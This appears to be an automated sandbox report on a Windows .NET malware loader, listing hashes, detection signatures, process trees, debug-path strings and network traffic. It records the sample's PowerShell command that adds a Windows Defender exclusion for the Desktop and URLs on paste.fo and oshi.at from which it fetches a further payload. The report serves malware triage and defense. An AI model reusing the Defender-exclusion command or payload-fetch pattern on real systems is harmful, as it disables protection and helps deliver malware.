Windows Analysis Report
9K25QyJ4hA.exe

Overview

General Information

Sample name: 9K25QyJ4hA.exe (renamed because original name is a hash value)
Original sample name: b5858b684b93cec0c56768fda67e721595bdfa7d14dbf45b74abbf686c9b66a2.exe
Analysis ID: 1356250
MD5: 7e658759b69b246757803baf9f776a60
SHA1: 6e1304c6539500ba0100327ac64858c25639387c
SHA256: b5858b684b93cec0c56768fda67e721595bdfa7d14dbf45b74abbf686c9b66a2
Tags: exe

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 9K25QyJ4hA.exe (PID: 6780 cmdline: C:\Users\user\Desktop\9K25QyJ4hA.exe MD5: 7E658759B69B246757803BAF9F776A60)
    • powershell.exe (PID: 6968 cmdline: powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 6560 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 2440 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • 9K25QyJ4hA.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\9K25QyJ4hA.exe" MD5: 7E658759B69B246757803BAF9F776A60)
    • powershell.exe (PID: 7576 cmdline: powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 7836 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 2408 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • 9K25QyJ4hA.exe (PID: 7964 cmdline: "C:\Users\user\Desktop\9K25QyJ4hA.exe" MD5: 7E658759B69B246757803BAF9F776A60)
    • powershell.exe (PID: 7988 cmdline: powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 5956 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7964 -s 2416 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: 9K25QyJ4hA.exe | Avira: detected
Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: 9K25QyJ4hA.exe | ReversingLabs: Detection: 29%
Source: 9K25QyJ4hA.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 104.21.70.240:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.70.240:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.70.240:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: 9K25QyJ4hA.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065AC000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2406232584.00000000067FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb3 source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: HPko0C:\Windows\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: ?woC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdbE source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbX source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.pdbj source: WERD675.tmp.dmp.32.dr
Source: Binary string: \??\C:\Windows\exe\loadermode32bit get from pastein.pdba source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbVy source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbDc source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: loadermode32bit get from pastein.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdb6 source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000E23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\9K25QyJ4hA.PDB source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb P:P ,P_CorExeMainmscoree.dll source: 9K25QyJ4hA.exe
Source: Binary string: ?woC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbD source: 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdb( source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbGs source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb source: 9K25QyJ4hA.exe
Source: Binary string: mscorlib.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbB source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\loadermode32bit get from pastein.pdbC source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\loadermode32bit get from pastein.pdbpdbein.pdb< source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbhh source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbc source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbm source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: %%.pdb)s( source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbL} source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\loadermode32bit get from pastein.pdb source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.pdbTzIs source: WERB65A.tmp.dmp.23.dr
Source: Binary string: System.ni.pdbRSDS source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: @wo.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: osymbols\dll\mscorlib.pdbLb source: 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbL}ll source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000012.00000002.2323897269.00000000063B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.Core.pdbL0vw# source: WERD675.tmp.dmp.32.dr
Source: Binary string: System.Configuration.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\System.pdb source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: mscorlib.pdbTzIs source: WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdb/ source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb5y source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2323897269.00000000063C4000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp, WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdb) source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ein.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb P source: 9K25QyJ4hA.exe, 00000000.00000000.1216864322.00000000006C2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdbl source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?woC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb4 source: 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdbH source: WERD675.tmp.dmp.32.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.pdb4 source: WER9219.tmp.dmp.7.dr
Source: Binary string: symbols\dll\mscorlib.pdbLb source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: oxg|HPko0C:\Windows\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb7 source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbp source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: global traffic | HTTP traffic detected: GET /raw/015dbe46ef97 HTTP/1.1, Host: paste.fo, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /tqJAc/blueloqder.bin HTTP/1.1, Host: oshi.at, Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 5.253.86.15 5.253.86.15
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: paste.fo
Source: powershell.exe, 00000013.00000002.1439367542.00000000070E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000002.00000002.1328832036.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1434744810.000000000577B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002830000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://oshi.at
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B8D000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002830000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://oshi.atd
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.00000000027E4000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://paste.fo
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.00000000027E4000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://paste.fod
Source: powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1325694764.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1425512865.0000000004862000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1325694764.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.00000000027D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1425512865.0000000004711000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1504888944.0000000004381000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1325694764.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1425512865.0000000004862000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.7.dr | String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1325694764.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1425512865.0000000004711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1504888944.0000000004381000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.1504888944.00000000044D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BE6000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002806000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C88000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/somenonymous/OshiUpload
Source: powershell.exe, 00000002.00000002.1328832036.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1434744810.000000000577B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1517634097.00000000053EA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002810000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oshi.at
Source: 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oshi.at/tqJAc/blueloqder.bin
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.00000000027D2000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.fo
Source: 9K25QyJ4hA.exe | String found in binary or memory: https://paste.fo/raw/015dbe46ef97
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002799000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002C19000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.fo/raw/015dbe46ef97T
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0498B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0498B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08A43A98
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 2440
Source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 9K25QyJ4hA.exe
